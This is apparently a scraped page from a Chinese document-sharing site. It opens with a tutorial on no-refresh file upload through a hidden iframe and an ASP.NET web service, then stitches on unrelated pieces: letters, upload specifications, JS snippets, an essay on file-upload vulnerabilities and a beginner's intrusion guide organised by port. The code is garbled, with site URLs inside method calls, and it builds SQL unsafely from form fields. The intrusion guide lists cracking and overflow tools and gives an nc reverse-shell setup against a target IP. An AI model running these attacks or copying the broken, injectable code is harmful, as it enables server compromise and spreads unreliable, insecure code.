经过多方探索，结合网上的资料，我编写了此文档，经测试成功，可以实现无刷新页面上传文件。下面进行描述。

1.首先在页面中嵌入一Form表单可大可小。可设置样式

上传

注意：其中的type=”hidden”是为了向服务器端传送除了文件之外的数据。type=”submit”,设置为隐藏，因为他不好看，我们用了一个buttom代替（id=”btnUpload”）

2.为了实现无刷新上传，需要添加一个iframe，这个样式设置为隐藏就可以了。

看上面的from中的target，指向的是iframe(name=”hiden_frame”)

3.js端触发提交按钮

//图片上传

$(".pic #btnUpload").click(function(){

$("#actionuserHidden").val(actionuser);

$("#actionpasswordHidden").val(actionpassword);

if(action=="insert"){

//以当前系统时间为临时文件夹名称

$("#directorynamHidden").val(directoryname);

}else{

//以当前修改企业名称为文件名

$("#directorynamHidden").val(directoryname);

}

if($("#uploadFile").val()){

var imageName=$("#uploadFile").val();

// var imgType;

// if($.browser.msie|| $.browser.webkit|| $.browser.safari){//IE下的值不同和火狐下的imageName不同

// imageName=imageName.substring(https://www.wendangku.net/doc/1a11597899.html,stIndexOf("\\")+1); // }

// if(imageName.indexOf(":\\")>=0){//兼容其他浏览器

// imageName=imageName.substring(https://www.wendangku.net/doc/1a11597899.html,stIndexOf("\\")+1); // }

var imgType=imageName.substring(https://www.wendangku.net/doc/1a11597899.html,stIndexOf(".")+1);

if(imgType=="jpg"||imgType=="png"||imgType=="JPG"||imgType=="PNG"||imgType=="bmp"||i mgType=="BMP"||imgType=="gif"){

var myDate=new Date();

var randonm=Math.ceil(Math.random()*100000).toString();

var

datestring=myDate.getFullYear().toString()+myDate.getMonth().toString()+myDate.getDate().toS tring()+myDate.getHours().toString()+

myDate.getMinutes().toString()+myDate.getSeconds().toString()+myDate.getMilliseconds().toStri ng();

imageName=datestring+randonm+"."+imgType;

$("#imgnameHidden").val(imageName);

//$("#uploadFrom").submit();

$("#uploadFrom").find("#submit").click();

//console.log($("#hidden_frame").parent())

}else{

MessageBox("文件格式不正确");

}

}else{

MessageBox("请选择图片");

}

});

注意：其中主要的是这句话

$("#uploadFrom").find("#submit").click();

其他的是为了上传其他的数据，还有就是判断文件的类型。大家可以自行使用。

4.这一步就是为了用webserviec写上传文件的服务器端接口，大家要注意form中的action 这个动作，后面的就是服务器webservice的接口地址，相对路径一定要设置清楚

//上?传?图?片?

[WebMethod(MessageName = "UpLoadPIC", Description = "")]

public void UpLoadPIC()

{

HttpFileCollection files = HttpContext.Current.Request.Files;

string actionuser = HttpContext.Current.Request.Form["actionuser"];

string actionpassword = HttpContext.Current.Request.Form["actionpassword"];

string directoryname=HttpContext.Current.Request.Form["directoryname"];

string imgname=HttpContext.Current.Request.Form["imgname"];

PhotoManage photo = new PhotoManage();

HttpContext.Current.Response.ContentType = "text/html";

HttpContext.Current.Response.ContentEncoding = System.Text.Encoding.Unicode;

HttpContext.Current.Response.Write(photo.UpLoadImg(actionuser, actionpassword,

directoryname, imgname, files));

}

注意：如何获得除了文件以外的actionuser等参数，使用的是HttpContext.Current.Request.Form，当然PhotoManage这个类的使用，只是为了调用UpLoadImg这个函数。

5.UpLoadImg函数接受文件存到某个文件夹下

//上?传?图?片?

public string UpLoadImg(string actionuser, string actionpassword, string directoryname, string imgname,HttpFileCollection files)

{

string message = "";

string filepath = Common.GetAppSetting("PHOTOPATH");

if (Common.Verification("dataInsert") == "false")

{

return

"";

}

HttpPostedFile postedFile = files[0];

if (postedFile.ContentLength > 104857600)

{

message = "{err:\"Exceed\"}";

return"";

}

string time = DateTime.Now.ToString();

string UpLoadImgOperate = string.Format("insert into

log([user],[table],[action],[dataname],[time])" +

" values('{0}','{1}','{2}','{3}','{4}')", actionuser, "文?件t夹

D"+directoryname, "上?传?图?片?", imgname, time);

int operateCount = DbService.ExcuteSQL(UpLoadImgOperate);

if (operateCount > 0)

{

try

{

string fileprename = imgname.Substring(0, https://www.wendangku.net/doc/1a11597899.html,stIndexOf("."));

//判D段?文?件t类え?型í

string fileType=imgname.Substring(https://www.wendangku.net/doc/1a11597899.html,stIndexOf(".")+1);

if(fileType== "jpg"|| fileType== "png"|| fileType== "JPG"|| fileType == "PNG" || fileType == "bmp" || fileType == "BMP" || fileType == "gif")

{

//判D断?文?件t夹D是?否?存?在ú

if (Directory.Exists(filepath + "\\" + directoryname))

{

if(File.Exists(filepath+ "\\"+ directoryname+ "\\"+ imgname))

{

imgname = fileprename +

DateTime.Now.ToString("yyyyMMddhhmmss").Trim() + "." + fileType;

}

postedFile.SaveAs(filepath + "\\" + directoryname + "\\" + imgname);

}

else

{

Directory.CreateDirectory(filepath + "\\" + directoryname);

postedFile.SaveAs(filepath + "\\" + directoryname + "\\" + imgname);

}

message = "{directoryname:\"" + directoryname + "\",imgname:\"" + imgname + "\"}";

return"

type='text/javascript'>window.top.globalFunc['UploadSuccess']('" + message +

"')";

}

else

{

message = "{err:\"Format\"}";

return"";

}

}

catch (Exception e)

{

string delectRecord = string.Format("delete * from log where [time]

='{0}'", time);

DbService.ExcuteSQL(delectRecord);

message = "{err:\"FileSystem\"}";

return"";

}

}

else

{

message = "{err:\"Recorde\"}";

return"

language='javascript'>window.top.globalFunc['UploadError']('"+ message+ "');";

}

}

主要是postedFile.SaveAs(filepath + "\\" + directoryname + "\\" + imgname);

这句话就是将客户端上传的文件放到指定的文件夹路径下。Filepath是我在配置文件web.config中写好的路径。

这句话是调用了客户端的函数，为了继续执行客户端程序，或者是给用户一个提醒，说上传成功或者是失败。

附带客户端失败处理函数

//上传失败回调函数

globalFunc.UploadError=function(err){

//MessageBox("图片上传失败"+err);

if(err.toString()=="authority"){

MessageBox("无权进行相关操作");

return;

}

var error=eval('('+err+')');

var reselt=error.err;

switch (reselt){

case "Exceed":

MessageBox("文件过大无法上传，请选择文件小于100M");

break;

case "Format":

MessageBox("文件格式不支持，选择JPG、PNG、BMP、GIF格式");

case "FileSystem":

MessageBox("服务器文件系统异常，请重新配置服务器");

break;

case "Recorde":

MessageBox("操作无法记录日志文件！");

break;

default :

break;

}

MessageBox("发生错误，文件无法上传！");

}

注意globalFunc是个对象数组

6.最后一个问题就是用表单的形式上传文件是有大小限制的，在服务器端，也就是web.config 配置文件中可以写上以下几句话

minLocalRequestFreeThreads="4"appRequestQueueLimit="100"/>

要写在system.web节点之下。maxRequetLength单位好像是字节。还有就是在IIS中也是限制的

要修改，大家可以百度一下。

基本上就是这么一个流程，有问题邮箱问741841403@https://www.wendangku.net/doc/1a11597899.html,

说明函格式,说明函格式范文

说明函格式,说明函格式范文 【爱文库】核心用户上传 说明函格式,说明函格式范文 尊敬的媒体朋友： 海辰机构作为一汽-大众“大众”品牌全国唯一指定公关代理公司，现就2006 年8 月1 0 日《京华时报》报道一汽-大众速腾后刹车油泵问题的进展情况向媒体朋友通报如下： 1.一汽-大众领导看到报道后非常重视，立即启动危机处理应急机制，在两个 小时内查明：到目前为止在全国范围尚没有收到一例关于后刹车盘油泵问题的投诉； 2.文中提到的用户情况为：该用户主观感觉车后部有异响，委托其修车的朋友检查，该朋友建议去4S 店做后刹车泵检查是否漏油，经一汽-大众特约维修服务 站亚之杰检查未发现任何问题； 3.一汽-大众有关方面就文中提及另外车辆问题正在努力联系记者请求提供车 架号以便一汽-大众澄清事实、查明原因，更好地为客户解决问题； 4.一汽-大众多年以来一直秉承“用户第一”的理念，特别是在今年营销变革 实施之后成立了“质量安全保障部”负责产品质量、安全方面的工作。因《京华时报》反应的问题涉及到汽车安全， Jay_h1218奉上 【爱文库】核心用户上传 根据一汽-大众相关规定：涉及安全问题必须24 小时之内解决。目前相关工 作已经全面启动，如有更新进展我们会随时通报媒体朋友。一汽-大众对媒体朋友多年来的支持与关注在此表示深深的感谢! 佛山市顺德区华达电器制造有限公司2003年在中山市黄圃镇新丰北路6号新 建一座工业园，因新工业园地处中山，2003 年6 月在中山市工商行政管理局注册 为“中山欧柏电器有限公司”，因公司发展需要，2008 年12 月更名为“中山欧 盈光电科技有限公司”。 “佛山市顺德区华达电器制造有限公司”及“中山欧盈光电科技有限公司”的股东是一致的，所以我公司对外开展业务时，以两家公司中任意一家公司的名义，都互为承担一切责任！特此说明！ 佛山市顺德区华达电器制造有限公司（公章） 中山欧盈光电科技有限公司（公章） 2009 年12 月29 日 Jay_h1218奉上

上传报名电子附件说明

附件３: 上传报名电子附件说明 注：学员提供报名电子附件时,须以姓名为文件夹，文件夹内包括以身份证号+材料名称（如身份证号+照片)命名的上传附件名。分子公司、直属企业汇总后，打包发送给集团公司人力资源部联系人赵洲洋。 1．学员电子照片的采集 采集的照片电子图像为彩色图像，按照1人1个图像文件的方式存储。图像文件采用“身份证号”命名，格式为“.jpg”具体参数如下: 扫描分辨率设定为300dpi 图片尺寸（像素)：宽480×高640 文件大小：≥30ＫB且≤60KＢ 文件格式：jpg 被摄人服装：白色或浅色系 照片底色:蓝色 如下图所示: 只能采用数码照相机拍摄，数码相机要求像素不少于3百万。 2．身份证原件电子扫描件

采集的身份证原件为彩色图像，按照1人１个图像文件的方式存储。图像文件采用“身份证号”命名，格式为“.ｊpg”。具体参数如下: 扫描分辨率设定为150dｐi 图片尺寸：保持原始证件大小（参考数据宽56０×高３95） 文件大小：≤5０ＫB 学员如有更名情况,相应证明材料与身份证复印件一起扫描成一张图片，命名方式与身份证扫描件命名方式相同。 扫描分辨率设定为150dpi 图片尺寸：保持原始证件大小 文件大小：≤120KB 3.入学时最高学历证书原件的电子扫描件 采集的最高学历证书为彩色图像，按照1人1个图像文件的方式存储。图像文件采用“身份证号”命名，格式为“. jpg”。具体参数如下： 扫描分辨率设定为1００dpｉ 图片尺寸：保持原始证件大小(参考数据宽130０×高900）文件大小:≤１0０KB 文件格式：ｊpg 4．其他材料 采集的其他材料为彩色图像，按照1人１个图像文件的方式存储。图像文件采用“身份证号”命名，格式为“. ｊpg”。具体参数如下: 扫描分辨率设定为１00dpi 图片尺寸：保持原始证件大小（参考数据宽1300×高9０0） 文件大小：≤１20KB 文件格式：ｊpｇ

JS分段获取URL解析

JS分段获取URL解析 URL : 统一资源定位符 (Uniform Resource Locator, URL) 完整的URL由这几个部分构成： scheme://host:port/path?query#fragment scheme = 通信协议 (常用的http,ftp,maito等) host = 主机 (域名或IP) port = 端口号 path = 路径 query = 查询 可选，用于给动态网页（如使用CGI、ISAPI、PHP/JSP/ASP/https://www.wendangku.net/doc/1a11597899.html,等技术制作的网页）传递参数，可有多个参数，用”&”符号隔开，每个参数的名和值用”=”符号隔开。 fragment = 信息片断 字符串，用于指定网络资源中的片断。例如一个网页中有多个名词解释，可使用fragment直接定位到某一名词解释。(也称为锚点.) 对于这样一个URL https://www.wendangku.net/doc/1a11597899.html,:80/seo/?ver=1.0&id=6#imhere 我们可以用javascript获得其中的各个部分 1, window.location.href 整个URl字符串(在浏览器中就是完整的地址栏) 2,window.location.protocol URL 的协议部分

本例返回值:http: 3,window.location.host URL 的主机部分 本例返回值:https://www.wendangku.net/doc/1a11597899.html, 4,window.location.port URL 的端口部分 如果采用默认的80端口(update:即使添加了:80)，那么返回值并不是默认的80而是空字符本例返回值:”" 5,window.location.pathname URL 的路径部分(就是文件地址) 本例返回值:/seo/ 6,window.location.search 查询(参数)部分 除了给动态语言赋值以外，我们同样可以给静态页面,并使用javascript来获得相信应的参数值本例返回值:?ver=1.0&id=6 7,window.location.hash 锚点 本例返回值:#imhere

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法（入侵菜鸟必看）1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键） 最后SQLTools.exe入侵 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 （以上反向的，测试成功） sqlhelloz.exe 入侵ip 1433 （这个是正向连接） 2. 4899端口入侵 用4899过滤器.exe，扫描空口令的机器 3. 3899的入侵 对很早的机器，可以试试3389的溢出(win3389ex.exe) 对2000的机器，可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器，可以用webdav入侵； 对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe） 可以利用SQL进行注入。（小榕的注入软件）。 5. serv-u入侵(21端口） 对5. 004及以下系统，可用溢出入侵。（serv5004.exe） 对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

====================================== 对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs） 输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞， 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。 10. 其他入侵 利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。 各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破（字典是关键） 最后SQLTool*.**e入侵 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

js下载文件的实现方法一

js下载文件的实现方法一 f8b js下载文件的实现方法及注意 js中实现文件下载 （一） 最简单的方式是在页上做超级链接如：<a href="music/abc.m3">下载</a>。 但是这样服务器上的目录资源会直接暴露给最终用户会给站带来一些不安全的因素。 因此可以采用其它方式实现下载可以采用： 1、RequestDisatcher的方式进行；

2、采用文件流输出的方式下载。（推荐） 1、采用RequestDisatcher的方式进行 Js代码 <% resonse.setContentTye("alication/x-download");//设置为下载alication/x-download String filedownload = "/要下载的文件名";//即将下载的文件的相对径 String filedislay = "最终要显示给用户的保存文件名";//下载文件时显示的文件保存名称 String filenamedislay = URLEncoder.encode(filedislay,"UTF-8"); resonse.addHeader("Content-Disosition","attachment;filena me=" + filedislay); try { RequestDisatcher dis = alication.getRequestDisatcher(filedownload);

文件上传漏洞及解析漏洞总结

文件上传漏洞及解析漏洞总结 文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的，“文件上传”本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重的后果。 文件上传后导致的常见安全问题一般有: 1)上传文件是Web脚本语言，服务器的Web容器解释并执行了用户上传的脚本，导致代码执行。 2)上传文件是Flash的策略文件crossdomain.xml，黑客用以控制Flash在该域下的行为(其他通过类似方式控制策略文件的情况类似); 3)上传文件是病毒、木马文件，黑客用以诱骗用户或者管理员下载执行。 4)上传文件是钓鱼图片或为包含了脚本的图片，在某些版本的浏览器中会被作为脚本执行，被用于钓鱼和欺诈。 除此之外，还有一些不常见的利用方法，比如将上传文件作为一个入口，溢出服务器的后台处理程序，如图片解析模块;或者上传一个合法的文本文件，其内容包含了PHP脚本，再通过"本地文件包含漏洞(Local File Include)"执行此脚本;等等。 要完成这个攻击，要满足以下几个条件: 首先，上传的文件能够被Web容器解释执行。所以文件上传后所在的目录要是Web容器所覆盖到的路径。 其次，用户能够从Web上访问这个文件。如果文件上传了，但用户无法通过Web访问，或者无法得到Web容器解释这个脚本，那么也不能称之为漏洞。 最后，用户上传的文件若被安全检查、格式化、图片压缩等功能改变了内容，则也可能导致攻击不成功。 一、从FCKEditor文件上传漏洞谈起 FCKEditor是一款非常流行的富文本编辑器，为了方便用户，它带有一个文件上传功能，但是这个功能却出过多次漏洞。 FCKEditor针对ASP/PHP/JSP等环境都有对应的版本，以PHP为例，其文件上传功能在：

《附件上传方案设计》

附件上传方案设计 一、引题 B端业务系统流程中，经常遇到需要把文件或者材料拿给别人确认或查看的情况。 举个例子： 如当销售人员签完合同后，需要对合同要素进行录入并上传合同附件，由业务相关人员根据合同内容进行业务配置相关的产品服务。如果不能上传附件的话，销售人员需要将合同原件通过钉钉发送或者邮寄的方式寄给业务人员，这个过程将会浪费很多的时间。 邮寄的方式： 问清楚业务人员的联系方式与地址（哪个分公司？由于人员流动性原因有可能过一段时间就换人了）； 通过手机选择一个快递公司； 输入收件地址与寄件地址，支付并下单； 将签署完的合同整理好，等待快递小哥上门取件； 快递小哥上门取件，打印快递单； 1天过去了； 2天过去了； 3天过去了； 业务人员收件，并根据合同内容进行后续操作流程。

钉钉的方式： ?将签署完的合同拍照或者扫描，进行整理后； ?在钉钉上找到业务人员，如果没有添加，还需进行添加，如果有，直接发送； ?业务人员接收到合同文件，根据合同内容进行后续操作； ?由于人员流动性原因，以及人的能动性。忘记保存在固定的文件中，合同扫描件可能会在交接过程中存在不完整的情况，导致系统上有的合同编号，没有合同扫描件或者合同照片。 以上流程中，可以看出： ?在合同对接过程中效率不是很高。 ?由于人员流动原因，系统上存在的合同编号有时会找不到对应的合同原件，没有办法追溯到合同信息的准确性。 在涉及文件材料的场景中，附件上传功能，用户可以将材料文件上传到系统中，他人可以快速的进行浏览、查阅。这一过程也会变得很有效率。 二、如何设计附件上传功能？ 用户在进行附件上传时，需要提前将上传的文件准备好，只需点击上传，选择文件就可以进行上传了，上传完成后，需要查看上传文件以及数量是否正确，如果正确，这个动作就完成了，如果不正确，

jquery.js文件报错-解决方法

jquery.js文件报错-解决方法 tomcat首页报Directory listing for错误， eclipse启动tomcat，首页报404错误 引入一个正常的新项目后，eclipse报错: 一、jQuery.js文件报错 解决办法： 1.window-preferences-中将JavaScript -validator-erros warnings取消

2.将eclipse工作空间中的当前项目的.project文件中的 org.eclipse.wst.jsdt.core.javascriptValidator 代码注释掉。 3.将项目中的Jquery.js文件复制一份到桌面。将原来的文件删除。将桌面的jquery.js 文件复制到项目中原来的位置。 4.clean ,refresh，可以看到：项目已经不报错了。 二、tomcat首页报Directory listing for错误 1.在tomcat安装目录下的bin中startup.bat启动，首页可以正常访问。说明：不是tomcat 有问题。而是eclipse中配置的tomcat有问题。 （注：之前在网上看到一些文章说是修改tomcat目录下web.xml中